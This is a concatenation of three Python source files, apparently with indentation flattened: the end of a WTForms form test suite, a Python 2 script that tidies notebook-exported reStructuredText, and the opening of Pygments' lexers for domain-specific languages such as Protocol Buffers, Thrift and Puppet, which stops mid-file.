def test_subclassing(self):
class A(Form):
a = StringField()
c = StringField()
class B(A):
b = StringField()
c = StringField()
A()
B()
assert A.a is B.a
assert A.c is not B.c
assert A._unbound_fields == [("a", A.a), ("c", A.c)]
assert B._unbound_fields == [("a", B.a), ("b", B.b), ("c", B.c)]
def test_class_meta_reassign(self):
class MetaA:
pass
class MetaB:
pass
class F(Form):
Meta = MetaA
assert F._wtforms_meta is None
assert isinstance(F().meta, MetaA)
assert issubclass(F._wtforms_meta, MetaA)
F.Meta = MetaB
assert F._wtforms_meta is None
assert isinstance(F().meta, MetaB)
assert issubclass(F._wtforms_meta, MetaB)
class TestForm:
class F(Form):
test = StringField()
def validate_test(self, field):
if field.data != "foobar":
raise ValidationError("error")
def test_validate(self):
form = self.F(test="foobar")
assert form.validate() is True
form = self.F()
assert form.validate() is False
def test_validate_with_extra(self):
class F2(self.F):
other = StringField()
def extra(form, field):
if field.data != "extra":
raise ValidationError("error")
form = F2(test="foobar", other="extra")
assert form.validate(extra_validators={"other": [extra]})
form = F2(test="foobar", other="nope")
assert not form.validate(extra_validators={"other": [extra]})
form = F2(test="nope", other="extra")
assert not form.validate(extra_validators={"other": [extra]})
def test_form_level_errors(self):
class F(Form):
a = IntegerField()
b = IntegerField()
def validate(self):
if not super().validate():
return False
if (self.a.data + self.b.data) % 2 != 0:
self.form_errors.append("a + b should be even")
return False
return True
f = F(a=1, b=1)
assert f.validate()
assert not f.form_errors
assert not f.errors
f = F(a=0, b=1)
assert not f.validate()
assert ["a + b should be even"] == f.form_errors
assert ["a + b should be even"] == f.errors[None]
def test_field_adding_disabled(self):
form = self.F()
with pytest.raises(TypeError):
form.__setitem__("foo", StringField())
def test_field_removal(self):
form = self.F()
del form.test
assert "test" not in form
assert form.test is None
assert len(list(form)) == 0
# Try deleting a nonexistent field
with pytest.raises(AttributeError):
form.__delattr__("fake")
def test_delattr_idempotency(self):
form = self.F()
del form.test
assert form.test is None
# Make sure deleting a normal attribute works
form.foo = 9
del form.foo
with pytest.raises(AttributeError):
form.__delattr__("foo")
# Check idempotency
del form.test
assert form.test is None
def test_ordered_fields(self):
class MyForm(Form):
strawberry = StringField()
banana = StringField()
kiwi = StringField()
assert [x.name for x in MyForm()] == ["strawberry", "banana", "kiwi"]
MyForm.apple = StringField()
assert [x.name for x in MyForm()] == ["strawberry", "banana", "kiwi", "apple"]
del MyForm.banana
assert [x.name for x in MyForm()] == ["strawberry", "kiwi", "apple"]
MyForm.strawberry = StringField()
assert [x.name for x in MyForm()] == ["kiwi", "apple", "strawberry"]
# Ensure sort is stable: two fields with the same creation counter
# should be subsequently sorted by name.
MyForm.cherry = MyForm.kiwi
assert [x.name for x in MyForm()] == ["cherry", "kiwi", "apple", "strawberry"]
def test_data_arg(self):
data = {"test": "foo"}
form = self.F(data=data)
assert form.test.data == "foo"
form = self.F(data=data, test="bar")
assert form.test.data == "bar"
def test_empty_formdata(self):
"""If formdata is empty, field.process_formdata should still
run to handle empty data.
"""
class EmptyStringField(StringField):
def process_formdata(self, valuelist):
self.data = valuelist[0] if valuelist else "processed"
class F(Form):
test = EmptyStringField()
assert F().test.data is None
assert F(test="test").test.data == "test"
assert F(DummyPostData({"other": "other"})).test.data == "processed"
assert F(DummyPostData()).test.data == "processed"
assert F(DummyPostData(), test="test").test.data == "processed"
assert F(DummyPostData({"test": "foo"}), test="test").test.data == "foo"
def test_errors_access_during_validation(self):
class F(Form):
foo = StringField(validators=[DataRequired()])
def validate(self):
super().validate()
self.errors
self.foo.errors.append("bar")
return True
form = F(foo="whatever")
form.validate()
assert {"foo": ["bar"]} == form.errors
class TestMeta:
class F(Form):
class Meta:
foo = 9
test = StringField()
class G(Form):
class Meta:
foo = 12
bar = 8
class Basic(F, G):
class Meta:
quux = 42
class MissingDiamond(F, G):
pass
def test_basic(self):
form = self.Basic()
meta = form.meta
assert meta.foo == 9
assert meta.bar == 8
assert meta.csrf is False
assert isinstance(meta, self.F.Meta)
assert isinstance(meta, self.G.Meta)
assert type(meta).__bases__ == (
self.Basic.Meta,
self.F.Meta,
self.G.Meta,
DefaultMeta,
)
def test_missing_diamond(self):
meta = self.MissingDiamond().meta
assert type(meta).__bases__ == (self.F.Meta, self.G.Meta, DefaultMeta)
|
|
# Post-processes the .rst files in the current directory (apparently exported
# from notebooks): fixes note indentation, strips helper markers, rewrites link
# markers, converts embedded HTML tables via pandoc and tidies math blocks.
import codecs
from os import listdir, path
import pypandoc
import sys
from re import sub
import re
def get_rst_file_names():
def ends_with_rst(line):
return line.endswith('.rst')
return filter(ends_with_rst, listdir(path.curdir))
def get_lines(file_name):
with codecs.open(file_name, 'r', 'utf-8') as f:
lines = f.readlines()
return lines
def save_lines(lines, file_name):
with codecs.open(file_name, "w", "utf-8") as f:
f.writelines(lines)
def fix_note_indentation(lines):
for i, line in enumerate(lines):
if line.startswith('.. note::'):
counter = i
while True:
counter += 1
try:
if lines[counter] == '\n':
break
else:
lines[counter] = ' ' + lines[counter]
except IndexError:
break
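# Sketch of the intended transform (assumed input shape): every non-blank
# line following a ".. note::" directive gains a four-space indent so the
# block nests under the directive, e.g.
#   ".. note::" / "Check the docs."  ->  ".. note::" / "    Check the docs."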
def remove_endswith(lines, exclude_string='#ex\n'):
new_lines = []
for line in lines:
if not line.endswith(exclude_string):
new_lines.append(line)
return new_lines
def remove_startsswith(lines, exclude_string):
new_lines = []
for line in lines:
if not line.startswith(exclude_string):
new_lines.append(line)
return new_lines
def remove_empty_block(lines, block_string):
new_lines = []
for i, line in enumerate(lines):
if line.startswith(block_string) and lines[i + 2] == ' \n':
pass
elif line.startswith(block_string) and lines[i + 2] == '\n':
pass
else:
new_lines.append(line)
return new_lines
def replace_in_string(line, to_replace, replacement):
new_string = line
while True:
try:
new_string = line[:line.index(
to_replace)] + replacement + line[line.index(to_replace) + len(to_replace):]
line = new_string
except ValueError:
break
return new_string
def replace_in_all(lines, to_replace, replacement):
new_lines = []
for line in lines:
new_lines.append(replace_in_string(line, to_replace, replacement))
return new_lines
def remove_specified_images(lines):
new_lines = []
remove_next = False
for line in lines:
if line.endswith('#remove_next\n'):
remove_next = True
elif remove_next and line.startswith('.. image'):
remove_next = False
else:
new_lines.append(line)
return new_lines
def clear_extra_slashes(line):
return line.replace('\\\\', '@@@@').replace('\\', '').replace('@@@@', '\\')
def table_math(new_line):
slash_matches = re.findall(r':math:\\`(.*?)`', new_line)
for s_m in slash_matches:
s, d = count_slashes(s_m)
s_m_clean = clear_extra_slashes(s_m)
new_line = new_line.replace(':math:\\`%s`' % s_m,
':math:`%s` %s%s' % (s_m_clean, s * ' ', d * ' '))
return new_line
def convert_html_tables(lines):
new_lines = []
replace_next = False
for line in lines:
if line.startswith('.. raw:: html'):
replace_next = True
elif replace_next and line != '\n':
table = line.strip()
new_line = pypandoc.convert(table, to='rst', format='html')
new_line = table_math(new_line)
new_lines.append(new_line)
replace_next = False
else:
new_lines.append(line)
new_lines = [line + '\n' for line in ''.join(new_lines).splitlines()]
return new_lines
def count_slashes(a_string):
doubles = a_string.count('\\\\')
singles = a_string.count('\\') - 2 * doubles
return singles, doubles
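# Worked example: count_slashes(r'a\\b\c') returns (1, 1) -- one escaped
# pair ("\\") and one remaining single backslash.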
def add_in_out(lines):
counter = 0
new_lines = []
for line in lines:
if line.startswith('.. code::'):
counter += 1
line = '``In [%s]:``\n\n%s' % (counter, line)
if line.startswith('.. parsed-literal::'):
line = '``Out[%s]:``\n\n%s' % (counter, line)
new_lines.append(line)
return new_lines
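# Sketch of the result: the n-th ".. code::" block is preceded by an
# "``In [n]:``" label and the ".. parsed-literal::" output block that
# follows it by "``Out[n]:``", mimicking notebook prompt numbering.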
def sub_math(lines):
new_lines = []
for line in lines:
matches = re.findall(r'\$(.*?)\$', line)
for match in matches:
line = line.replace('$%s$' % match,
':math:`%s`' % (match))
new_lines.append(line)
return new_lines
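# Worked example: "Euler's identity $e^{i\pi} + 1 = 0$ holds" becomes
# "Euler's identity :math:`e^{i\pi} + 1 = 0` holds".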
def find_tables(lines):
"""
For a list of lines, splits the lines into blocks (lists of lines,
stored in two outer lists) representing tables and non-tables. Also
returns whether the file starts with a table or a non-table (mostly
non-tables, but the functionality is included for robustness).
"""
in_table = False
tables = []
non_tables = []
current_table = []
current_non_table = []
text_first = None
for i, line in enumerate(lines):
if line.startswith('+') and line.strip().endswith('+') and not in_table:
in_table = True
if len(current_non_table) != 0:
non_tables.append(current_non_table)
current_non_table = []
current_table.append(line)
if text_first is None:
text_first = False
elif in_table and (line.startswith('+') or line.startswith('|')):
current_table.append(line)
elif in_table:
in_table = False
tables.append(current_table)
current_table = []
current_non_table.append(line)
else:
if text_first is None:
text_first = True
current_non_table.append(line)
if len(current_non_table) != 0:
non_tables.append(current_non_table)
if len(current_table) != 0:
tables.append(current_table)
return tables, non_tables, text_first
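# Sketch of the split (assuming RST grid tables): rows such as
# "+----+----+" and "| a  | b  |" are grouped into ``tables`` while the
# surrounding prose lines go into ``non_tables``; ``text_first`` records
# which kind the file opened with, so weave_lists() can re-interleave the
# blocks in their original order.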
def weave_lists(tables, non_tables, text_first):
"""
Takes a list of tables, non-tables and a boolean indicating which
should come first and returns a single list of lines.
"""
new_list = []
total_blocks = len(tables) + len(non_tables)
for i in range(total_blocks):
if text_first:
new_list.extend(non_tables.pop(0))
text_first = False
else:
new_list.extend(tables.pop(0))
text_first = True
return new_list
def fix_all_table_split(lines):
"""
Uses find_tables, fix_table_splits and weave_lists to construct
a new list of all lines with tables with the correct formatting.
"""
tables, non_tables, text_first = find_tables(lines)
new_tables = []
for table in tables:
new_tables.append(fix_table_splits(table))
return weave_lists(new_tables, non_tables, text_first)
def fix_table_splits(table_lines):
"""
Adds an escape "\" to lines where text has been split incorrectly
(prematurely).
"""
new_table = []
for line in table_lines:
if line.startswith('+'):
new_line = ''
line_type = line[1]
for i, char in enumerate(line):
if char == '+' and line[i + 1] == line_type:
char = '+' + line_type
new_line = new_line + char
new_table.append(new_line)
else:
new_line = ''
for i, char in enumerate(line):
if char == ' ' and line[i + 1] == '|':
if line[i - 1] != ' ':
char = '\ '
else:
char = ' '
new_line = new_line + char
new_table.append(new_line)
return new_table
if __name__ == "__main__":
to_remove_block_strings = ['.. code::', '.. parsed-literal::']
ends_with_to_remove = ['#ex\n']
starts_with_to_remove = [' %matplotlib inline']
replacements = [('*#', '`'),
('#*', '`_'),
('.ipynb#', '.html#'),
('code:: ipython2', 'code:: python')]
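# Sketch of what the marker replacements do (assuming the upstream export
# emits them): "*#Some page#*" becomes "`Some page`_", an RST hyperlink
# reference, and ".ipynb#" anchors are rewritten to ".html#" so links point
# at the built pages rather than the source notebooks.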
if len(sys.argv) == 1:
file_names = get_rst_file_names()
else:
file_names = sys.argv[1:]
for file_name in file_names:
print "Applying fixes for: ", file_name
lines = get_lines(file_name)
fix_note_indentation(lines)
for to_remove in ends_with_to_remove:
lines = remove_endswith(lines, to_remove)
for to_remove in starts_with_to_remove:
lines = remove_startsswith(lines, to_remove)
for to_replace, replacement in replacements:
lines = replace_in_all(lines, to_replace, replacement)
lines = remove_specified_images(lines)
lines = sub_math(lines)
lines = fix_all_table_split(lines)
lines = convert_html_tables(lines)
for block_to_remove in to_remove_block_strings:
lines = remove_empty_block(lines, block_to_remove)
lines = add_in_out(lines)
save_lines(lines, file_name)
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.dsls
~~~~~~~~~~~~~~~~~~~~
Lexers for various domain-specific languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words, include, default, \
this, using, combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Literal, Whitespace
__all__ = ['ProtoBufLexer', 'BroLexer', 'PuppetLexer', 'RslLexer',
'MscgenLexer', 'VGLLexer', 'AlloyLexer', 'PanLexer',
'CrmshLexer', 'ThriftLexer']
class ProtoBufLexer(RegexLexer):
"""
Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_
definition files.
.. versionadded:: 1.4
"""
name = 'Protocol Buffer'
aliases = ['protobuf', 'proto']
filenames = ['*.proto']
tokens = {
'root': [
(r'[ \t]+', Text),
(r'[,;{}\[\]()]', Punctuation),
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
(words((
'import', 'option', 'optional', 'required', 'repeated', 'default',
'packed', 'ctype', 'extensions', 'to', 'max', 'rpc', 'returns',
'oneof'), prefix=r'\b', suffix=r'\b'),
Keyword),
(words((
'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64',
'fixed32', 'fixed64', 'sfixed32', 'sfixed64',
'float', 'double', 'bool', 'string', 'bytes'), suffix=r'\b'),
Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'),
(r'(message|extend)(\s+)',
bygroups(Keyword.Declaration, Text), 'message'),
(r'(enum|group|service)(\s+)',
bygroups(Keyword.Declaration, Text), 'type'),
(r'\".*?\"', String),
(r'\'.*?\'', String),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'(\-?(inf|nan))\b', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'[+-=]', Operator),
(r'([a-zA-Z_][\w.]*)([ \t]*)(=)',
bygroups(Name.Attribute, Text, Operator)),
(r'[a-zA-Z_][\w.]*', Name),
],
'package': [
(r'[a-zA-Z_]\w*', Name.Namespace, '#pop'),
default('#pop'),
],
'message': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'type': [
(r'[a-zA-Z_]\w*', Name, '#pop'),
default('#pop'),
],
}
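# Minimal usage sketch (assumes pygments.highlight and a formatter are on hand):
#   from pygments import highlight
#   from pygments.formatters import TerminalFormatter
#   print(highlight('message Ping { required int32 id = 1; }',
#                   ProtoBufLexer(), TerminalFormatter()))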
class ThriftLexer(RegexLexer):
"""
For `Thrift <https://thrift.apache.org/>`__ interface definitions.
.. versionadded:: 2.1
"""
name = 'Thrift'
aliases = ['thrift']
filenames = ['*.thrift']
mimetypes = ['application/x-thrift']
tokens = {
'root': [
include('whitespace'),
include('comments'),
(r'"', String.Double, combined('stringescape', 'dqs')),
(r'\'', String.Single, combined('stringescape', 'sqs')),
(r'(namespace)(\s+)',
bygroups(Keyword.Namespace, Text.Whitespace), 'namespace'),
(r'(enum|union|struct|service|exception)(\s+)',
bygroups(Keyword.Declaration, Text.Whitespace), 'class'),
(r'((?:(?:[^\W\d]|\$)[\w.\[\]$<>]*\s+)+?)' # return arguments
r'((?:[^\W\d]|\$)[\w$]*)' # method name
r'(\s*)(\()', # signature start
bygroups(using(this), Name.Function, Text, Operator)),
include('keywords'),
include('numbers'),
(r'[&=]', Operator),
(r'[:;\,\{\}\(\)\<>\[\]]', Punctuation),
(r'[a-zA-Z_](\.[a-zA-Z_0-9]|[a-zA-Z_0-9])*', Name),
],
'whitespace': [
(r'\n', Text.Whitespace),
(r'\s+', Text.Whitespace),
],
'comments': [
(r'#.*$', Comment),
(r'//.*?\n', Comment),
(r'/\*[\w\W]*?\*/', Comment.Multiline),
],
'stringescape': [
(r'\\([\\nrt"\'])', String.Escape),
],
'dqs': [
(r'"', String.Double, '#pop'),
(r'[^\\"\n]+', String.Double),
],
'sqs': [
(r"'", String.Single, '#pop'),
(r'[^\\\'\n]+', String.Single),
],
'namespace': [
(r'[a-z\*](\.[a-zA-Z_0-9]|[a-zA-Z_0-9])*', Name.Namespace, '#pop'),
default('#pop'),
],
'class': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'keywords': [
(r'(async|oneway|extends|throws|required|optional)\b', Keyword),
(r'(true|false)\b', Keyword.Constant),
(r'(const|typedef)\b', Keyword.Declaration),
(words((
'cpp_namespace', 'cpp_include', 'cpp_type', 'java_package',
'cocoa_prefix', 'csharp_namespace', 'delphi_namespace',
'php_namespace', 'py_module', 'perl_package',
'ruby_namespace', 'smalltalk_category', 'smalltalk_prefix',
'xsd_all', 'xsd_optional', 'xsd_nillable', 'xsd_namespace',
'xsd_attrs', 'include'), suffix=r'\b'),
Keyword.Namespace),
(words((
'void', 'bool', 'byte', 'i16', 'i32', 'i64', 'double',
'string', 'binary', 'void', 'map', 'list', 'set', 'slist',
'senum'), suffix=r'\b'),
Keyword.Type),
(words((
'BEGIN', 'END', '__CLASS__', '__DIR__', '__FILE__',
'__FUNCTION__', '__LINE__', '__METHOD__', '__NAMESPACE__',
'abstract', 'alias', 'and', 'args', 'as', 'assert', 'begin',
'break', 'case', 'catch', 'class', 'clone', 'continue',
'declare', 'def', 'default', 'del', 'delete', 'do', 'dynamic',
'elif', 'else', 'elseif', 'elsif', 'end', 'enddeclare',
'endfor', 'endforeach', 'endif', 'endswitch', 'endwhile',
'ensure', 'except', 'exec', 'finally', 'float', 'for',
'foreach', 'function', 'global', 'goto', 'if', 'implements',
'import', 'in', 'inline', 'instanceof', 'interface', 'is',
'lambda', 'module', 'native', 'new', 'next', 'nil', 'not',
'or', 'pass', 'public', 'print', 'private', 'protected',
'raise', 'redo', 'rescue', 'retry', 'register', 'return',
'self', 'sizeof', 'static', 'super', 'switch', 'synchronized',
'then', 'this', 'throw', 'transient', 'try', 'undef',
'unless', 'unsigned', 'until', 'use', 'var', 'virtual',
'volatile', 'when', 'while', 'with', 'xor', 'yield'),
prefix=r'\b', suffix=r'\b'),
Keyword.Reserved),
],
'numbers': [
(r'[+-]?(\d+\.\d+([eE][+-]?\d+)?|\.?\d+[eE][+-]?\d+)', Number.Float),
(r'[+-]?0x[0-9A-Fa-f]+', Number.Hex),
(r'[+-]?[0-9]+', Number.Integer),
],
}
class BroLexer(RegexLexer):
"""
For `Bro <http://bro-ids.org/>`_ scripts.
.. versionadded:: 1.5
"""
name = 'Bro'
aliases = ['bro']
filenames = ['*.bro']
_hex = r'[0-9a-fA-F_]'
_float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?'
_h = r'[A-Za-z0-9][-A-Za-z0-9]*'
tokens = {
'root': [
# Whitespace
(r'^@.*?\n', Comment.Preproc),
(r'#.*?\n', Comment.Single),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text),
# Keywords
(r'(add|alarm|break|case|const|continue|delete|do|else|enum|event'
r'|export|for|function|if|global|hook|local|module|next'
r'|of|print|redef|return|schedule|switch|type|when|while)\b', Keyword),
(r'(addr|any|bool|count|counter|double|file|int|interval|net'
r'|pattern|port|record|set|string|subnet|table|time|timer'
r'|vector)\b', Keyword.Type),
(r'(T|F)\b', Keyword.Constant),
(r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire'
r'|default|disable_print_hook|raw_output|encrypt|group|log'
r'|mergeable|optional|persistent|priority|redef'
r'|rotate_(?:interval|size)|synchronized)\b',
bygroups(Punctuation, Keyword)),
(r'\s+module\b', Keyword.Namespace),
# Addresses, ports and networks
(r'\d+/(tcp|udp|icmp|unknown)\b', Number),
(r'(\d+\.){3}\d+', Number),
(r'(' + _hex + r'){7}' + _hex, Number),
(r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number),
(r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number),
(r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number),
# Hostnames
(_h + r'(\.' + _h + r')+', String),
# Numeric
(_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date),
(r'0[xX]' + _hex, Number.Hex),
(_float, Number.Float),
(r'\d+', Number.Integer),
(r'/', String.Regex, 'regex'),
(r'"', String, 'string'),
# Operators
(r'[!%*/+:<=>?~|-]', Operator),
(r'([-+=&|]{2}|[+=!><-]=)', Operator),
(r'(in|match)\b', Operator.Word),
(r'[{}()\[\]$.,;]', Punctuation),
# Identfier
(r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)),
(r'[a-zA-Z_]\w*', Name)
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String),
(r'\\\n', String),
(r'\\', String)
],
'regex': [
(r'/', String.Regex, '#pop'),
(r'\\[\\nt/]', String.Regex), # String.Escape is too intense here.
(r'[^\\/\n]+', String.Regex),
(r'\\\n', String.Regex),
(r'\\', String.Regex)
]
}
class PuppetLexer(RegexLexer):
"""
For `Puppet <http://puppetlabs.com/>`__ configuration DSL.
.. versionadded:: 1.6
"""
name = 'Puppet'
aliases = ['puppet']
filenames = ['*.pp']
tokens = {
'root': [
include('comments'),
include('keywords'),
include('names'),
include('numbers'),
include('operators'),
include('strings'),
(r'[]{}:(),;[]', Punctuation),
(r'[^\S\n]+', Text),
],
'comments': [
(r'\s*#.*$', Comment),
(r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
],
'operators': [
(r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator),
(r'(in|and|or|not)\b', Operator.Word),
],
'names': [
(r'[a-zA-Z_]\w*', Name.Attribute),
(r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation,
String, Punctuation)),
(r'\$\S+', Name.Variable),
],
'numbers': [
# Copypasta from the Python lexer
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
(r'0[0-7]+j?', Number.Oct),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+j?', Number.Integer)
],
'keywords': [
# Left out 'group' and 'require'
# Since they're often used as attributes
(words((
'absent', 'alert', 'alias', 'audit', 'augeas', 'before', 'case',
'check', 'class', 'computer', 'configured', 'contained',
'create_resources', 'crit', 'cron', 'debug', 'default',
'define', 'defined', 'directory', 'else', 'elsif', 'emerg',
'err', 'exec', 'extlookup', 'fail', 'false', 'file',
'filebucket', 'fqdn_rand', 'generate', 'host', 'if', 'import',
'include', 'info', 'inherits', 'inline_template', 'installed',
'interface', 'k5login', 'latest', 'link', 'loglevel',
'macauthorization', 'mailalias', 'maillist', 'mcx', 'md5',
'mount', 'mounted', 'nagios_command', 'nagios_contact',
'nagios_contactgroup', 'nagios_host', 'nagios_hostdependency',
'nagios_hostescalation', 'nagios_hostextinfo', 'nagios_hostgroup',
'nagios_service', 'nagios_servicedependency', 'nagios_serviceescalation',
'nagios_serviceextinfo', 'nagios_servicegroup', 'nagios_timeperiod',
'node', 'noop', 'notice', 'notify', 'package', 'present', 'purged',
'realize', 'regsubst', 'resources', 'role', 'router', 'running',
'schedule', 'scheduled_task', 'search', 'selboolean', 'selmodule',
'service', 'sha1', 'shellquote', 'split', 'sprintf',
'ssh_authorized_key', 'sshkey', 'stage', 'stopped', 'subscribe',
'tag', 'tagged', 'template', 'tidy', 'true', 'undef', 'unmounted',
'user', 'versioncmp', 'vlan', 'warning', 'yumrepo', 'zfs', 'zone',
'zpool'), prefix='(?i)', suffix=r'\b'),
Keyword),
],
'strings': [
(r'"([^"])*"', String),
(r"'(\\'|[^'])*'", String),
],
}
class RslLexer(RegexLexer):
"""
`RSL <http://en.wikipedia.org/wiki/RAISE>`_ is the formal specification
language used in RAISE (Rigorous Approach to Industrial Software Engineering)
method.
.. versionadded:: 2.0
"""
name = 'RSL'
aliases = ['rsl']
filenames = ['*.rsl']
mimetypes = ['text/rsl']
flags = re.MULTILINE | re.DOTALL
tokens = {
'root': [
(words((
'Bool', 'Char', 'Int', 'Nat', 'Real', 'Text', 'Unit', 'abs',
'all', 'always', 'any', 'as', 'axiom', 'card', 'case', 'channel',
'chaos', 'class', 'devt_relation', 'dom', 'elems', 'else', 'elif',
'end', 'exists', 'extend', 'false', 'for', 'hd', 'hide', 'if',
'in', 'is', 'inds', 'initialise', 'int', 'inter', 'isin', 'len',
'let', 'local', 'ltl_assertion', 'object', 'of', 'out', 'post',
'pre', 'read', 'real', 'rng', 'scheme', 'skip', 'stop', 'swap',
'then', 'theory', 'test_case', 'tl', 'transition_system', 'true',
'type', 'union', 'until', 'use', 'value', 'variable', 'while',
'with', 'write', '~isin', '-inflist', '-infset', '-list',
'-set'), prefix=r'\b', suffix=r'\b'),
Keyword),
(r'(variable|value)\b', Keyword.Declaration),
(r'--.*?\n', Comment),
(r'<:.*?:>', Comment),
(r'\{!.*?!\}', Comment),
(r'/\*.*?\*/', Comment),
(r'^[ \t]*([\w]+)[ \t]*:[^:]', Name.Function),
(r'(^[ \t]*)([\w]+)([ \t]*\([\w\s,]*\)[ \t]*)(is|as)',
bygroups(Text, Name.Function, Text, Keyword)),
(r'\b[A-Z]\w*\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'".*"', String),
(r'\'.\'', String.Char),
(r'(><|->|-m->|/\\|<=|<<=|<\.|\|\||\|\^\||-~->|-~m->|\\/|>=|>>|'
r'\.>|\+\+|-\\|<->|=>|:-|~=|\*\*|<<|>>=|\+>|!!|\|=\||#)',
Operator),
(r'[0-9]+\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'0x[0-9a-f]+', Number.Hex),
(r'[0-9]+', Number.Integer),
(r'.', Text),
],
}
def analyse_text(text):
"""
Check for the most common text in the beginning of a RSL file.
"""
if re.search(r'scheme\s*.*?=\s*class\s*type', text, re.I) is not None:
return 1.0
class MscgenLexer(RegexLexer):
"""
For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files.
.. versionadded:: 1.6
"""
name = 'Mscgen'
aliases = ['mscgen', 'msc']
filenames = ['*.msc']
_var = r'(\w+|"(?:\\"|[^"])*")'
tokens = {
'root': [
(r'msc\b', Keyword.Type),
# Options
(r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS'
r'|arcgradient|ARCGRADIENT)\b', Name.Property),
# Operators
(r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word),
(r'(\.|-|\|){3}', Keyword),
(r'(?:-|=|\.|:){2}'
r'|<<=>>|<->|<=>|<<>>|<:>'
r'|->|=>>|>>|=>|:>|-x|-X'
r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator),
# Names
(r'\*', Name.Builtin),
(_var, Name.Variable),
# Other
(r'\[', Punctuation, 'attrs'),
(r'\{|\}|,|;', Punctuation),
include('comments')
],
'attrs': [
(r'\]', Punctuation, '#pop'),
(_var + r'(\s*)(=)(\s*)' + _var,
bygroups(Name.Attribute, Text.Whitespace, Operator, Text.Whitespace,
String)),
(r',', Punctuation),
include('comments')
],
'comments': [
(r'(?://|#).*?\n', Comment.Single),
(r'/\*(?:.|\n)*?\*/', Comment.Multiline),
(r'[ \t\r\n]+', Text.Whitespace)
]
}
class VGLLexer(RegexLexer):
"""
For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_
source code.
.. versionadded:: 1.6
"""
name = 'VGL'
aliases = ['vgl']
filenames = ['*.rpf']
flags = re.MULTILINE | re.DOTALL | re.IGNORECASE
tokens = {
'root': [
(r'\{[^}]*\}', Comment.Multiline),
(r'declare', Keyword.Constant),
(r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object'
r'|create|on|line|with|global|routine|value|endroutine|constant'
r'|global|set|join|library|compile_option|file|exists|create|copy'
r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])',
Keyword),
(r'(true|false|null|empty|error|locked)', Keyword.Constant),
(r'[~^*#!%&\[\]()<>|+=:;,./?-]', Operator),
(r'"[^"]*"', String),
(r'(\.)([a-z_$][\w$]*)', bygroups(Operator, Name.Attribute)),
(r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number),
(r'[a-z_$][\w$]*', Name),
(r'[\r\n]+', Text),
(r'\s+', Text)
]
}
class AlloyLexer(RegexLexer):
"""
For `Alloy <http://alloy.mit.edu>`_ source code.
.. versionadded:: 2.0
"""
name = 'Alloy'
aliases = ['alloy']
filenames = ['*.als']
mimetypes = ['text/x-alloy']
flags = re.MULTILINE | re.DOTALL
iden_rex = r'[a-zA-Z_][\w\']*'
text_tuple = (r'[^\S\n]+', Text)
tokens = {
'sig': [
(r'(extends)\b', Keyword, '#pop'),
(iden_rex, Name),
text_tuple,
(r',', Punctuation),
(r'\{', Operator, '#pop'),
],
'module': [
text_tuple,
(iden_rex, Name, '#pop'),
],
'fun': [
text_tuple,
(r'\{', Operator, '#pop'),
(iden_rex, Name, '#pop'),
],
'root': [
(r'--.*?$', Comment.Single),
(r'//.*?$', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline),
text_tuple,
(r'(module|open)(\s+)', bygroups(Keyword.Namespace, Text),
'module'),
(r'(sig|enum)(\s+)', bygroups(Keyword.Declaration, Text), 'sig'),
(r'(iden|univ|none)\b', Keyword.Constant),
(r'(int|Int)\b', Keyword.Type),
(r'(this|abstract|extends|set|seq|one|lone|let)\b', Keyword),
(r'(all|some|no|sum|disj|when|else)\b', Keyword),
(r'(run|check|for|but|exactly|expect|as)\b', Keyword),
(r'(and|or|implies|iff|in)\b', Operator.Word),
(r'(fun|pred|fact|assert)(\s+)', bygroups(Keyword, Text), 'fun'),
(r'!|#|&&|\+\+|<<|>>|>=|<=>|<=|\.|->', Operator),
(r'[-+/*%=<>&!^|~{}\[\]().]', Operator),
(iden_rex, Name),
(r'[:,]', Punctuation),
